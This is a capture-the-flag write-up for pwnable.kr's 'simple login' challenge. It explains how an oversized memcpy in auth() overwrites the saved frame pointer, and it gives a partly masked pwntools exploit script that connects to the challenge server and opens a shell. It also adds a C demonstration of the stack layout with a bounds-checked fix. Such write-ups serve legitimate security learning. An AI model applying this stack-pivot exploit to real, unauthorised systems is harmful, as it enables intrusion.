December 13, 2017

pwnable.kr simple login write-up

[Image: Description of pwnable.kr simple login write-up]

Can you get authentication from this server?

[Image: executing test of pwnable.kr simple login write-up]

The above image is the screen when executed.

It is a program that prints a hash value for any value that is input. However, when I input the same values, different hash values are printed.

[Image: main function of pwnable.kr simple login write-up]

This is the decompiled main() function. The Base64Decode() function is the same function as in the previous challenge (Link). It Base64-decodes the value in v5, stores the result in v4, and returns the length of the decoded string.

If the length of the decoded value exceeds 12, the program terminates.

The decoded value v4 is copied into the global variable "input" and the auth() function is called. If auth() returns 1, the correct() function is called.

[Image: correct function of pwnable.kr simple login]

The correct() function executes the Bourne shell when the value of the input variable is 0xDEADBEEF.

[Image: auth function of pwnable.kr simple login]

The auth() function computes an MD5 hash and checks whether the generated value is equal to f87 ~ 34.

The memcpy() is a bit strange. The global variable "input" can hold up to 12 bytes, but v4 in auth() can hold only 4 bytes, so a buffer overflow occurs here.

Since the distance between v4 and ebp is 8, a 12-byte input overwrites the SFP (saved frame pointer) of the stack frame. Refer to the stack frame structure (Link).

When auth() returns and then main() returns, EIP ends up being modified.
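As an added illustration (not code from the challenge binary or this write-up), the following C program models the auth() frame layout described above, so that main()'s 12-byte limit can be compared with the 4-byte buffer actually being filled; the struct layout, the marker dwords and the initial saved-ebp value are assumptions constructed for the demo, and the hardened copy is the check a fixed auth() would need.

```c
#include <stdio.h>
#include <string.h>
#include <stdint.h>

/* Model of the auth() stack frame as the write-up describes it: a 4-byte
 * local v4 at ebp-8, one untouched 4-byte slot at ebp-4, then the saved ebp
 * (SFP). Using a struct keeps the copy well-defined C, so the overwrite can
 * be observed without real memory corruption. Layout is an assumption. */
struct auth_frame {
    uint8_t  v4[4];      /* ebp-8: the only buffer auth() meant to fill */
    uint8_t  slot[4];    /* ebp-4: bytes between v4 and the SFP */
    uint32_t saved_ebp;  /* ebp+0: caller's frame pointer (SFP) */
};

#define INPUT_MAX 12  /* the limit main() enforces on the decoded input */

/* main()'s check as described: it only bounds the total decoded length. */
int main_length_ok(size_t len) { return len <= INPUT_MAX; }

/* Copy modelled on the decompiled auth(): it trusts main()'s 12-byte limit. */
void auth_copy_unchecked(struct auth_frame *f, const uint8_t *in, size_t len) {
    memcpy(f, in, len);  /* 12 bytes run past v4 and over the saved ebp */
}

/* Hardened form: bound the copy by the destination, not the caller's limit.
 * Returns 0 on success, -1 when the input would not fit in v4. */
int auth_copy_checked(struct auth_frame *f, const uint8_t *in, size_t len) {
    if (len > sizeof f->v4) return -1;
    memcpy(f->v4, in, len);
    return 0;
}

/* Saved ebp value left behind by the unchecked copy of a len-byte input. */
uint32_t sfp_after_copy(const uint8_t *in, size_t len) {
    struct auth_frame f = { {0}, {0}, 0xBFFFF000u };  /* constructed SFP */
    auth_copy_unchecked(&f, in, len);
    return f.saved_ebp;
}

int main(void) {
    /* Constructed 12-byte input: 0xdeadbeef (the value correct() checks)
     * followed by two marker dwords, not the write-up's masked addresses. */
    const uint8_t in[INPUT_MAX] = { 0xef, 0xbe, 0xad, 0xde, 0x41, 0x41, 0x41, 0x41,
                                    0x42, 0x42, 0x42, 0x42 };
    struct auth_frame f;
    printf("main() accepts 12 bytes: %d\n", main_length_ok(sizeof in));
    printf("saved ebp after unchecked copy: 0x%08x\n", sfp_after_copy(in, sizeof in));
    printf("checked copy of 12 bytes: %d\n", auth_copy_checked(&f, in, sizeof in));
    return 0;
}
```

The second marker dword ends up in saved_ebp, which is exactly the SFP overwrite the write-up relies on; the checked copy refuses the same input.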




<te.py>
from pwn import *

# 12-byte payload, Base64-encoded so that main() accepts it (decoded length <= 12).
# The first dword is 0xdeadbeef (little-endian), the value correct() checks;
# the remaining bytes are masked in this write-up.
payload = b64e("\xef\xbe■■■■■"+"■■■■■■■■■"+"■■■■■■■■■■")
print len(payload)

#with process("./login") as pkr:   # local binary
with remote("pwnable.kr", 9003) as pkr:
    pkr.send(payload + "\n")   # the program reads one line of input
    print pkr.recvline()
    print pkr.recvline()
    pkr.interactive()          # drop into the shell spawned by correct()
* Some are masked

This is the exploit code. It works as follows. Referencing the stack frame state at the time of a function call (Link) and return (Link) will help you construct the payload.

[Operation order associated with the payload]
1. Return of auth(): The address of "input" is stored in ebp.
2. Return of main(): The address of "input" is stored in esp.
3. POP ebp: 0xdeadbeef is stored in ebp.
4. RET: The address of ■■■■■ is stored in ■■■■.

[Image: getting the flag of pwnable.kr simple login write-up]

The flag is obtained successfully.